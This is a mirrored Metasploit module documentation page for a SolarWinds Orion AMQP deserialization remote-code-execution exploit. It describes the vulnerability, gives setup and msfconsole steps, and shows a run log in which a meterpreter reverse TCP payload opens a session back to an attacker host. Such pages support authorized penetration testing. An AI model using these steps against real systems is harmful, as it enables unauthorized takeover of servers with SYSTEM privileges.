CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/misc/solarwinds_amqp_deserialization.md
Views: 1904

Vulnerable Application

The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.

Verification Steps

  1. Install the application (tested SolarWindows Orion NPM versions 2020.2.5 and 2020.2.6)

    1. After installation is complete, create an AMQP account so you know the credentials. The default account is orion.

    2. Open a command prompt in C:\Program Files (x86)\SolarWinds\Orion\RabbitMQ\sbin>

    3. Run: .\rabbitmqctl.bat add_user "hax" "Password1!"

    4. Run: .\rabbitmqctl.bat set_permissions hax .* .* .*

    5. Run: .\rabbitmqctl.bat set_user_tags hax administrator

  2. Start msfconsole

  3. Do: use exploit/windows/misc/solarwinds_amqp_deserialization

  4. Set the RHOSTS, USERNAME, PASSWORD, PAYLOAD and payload related-options

  5. Do: run

  6. You should get a shell.

Options

Scenarios

SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64

msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run

[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400

meterpreter >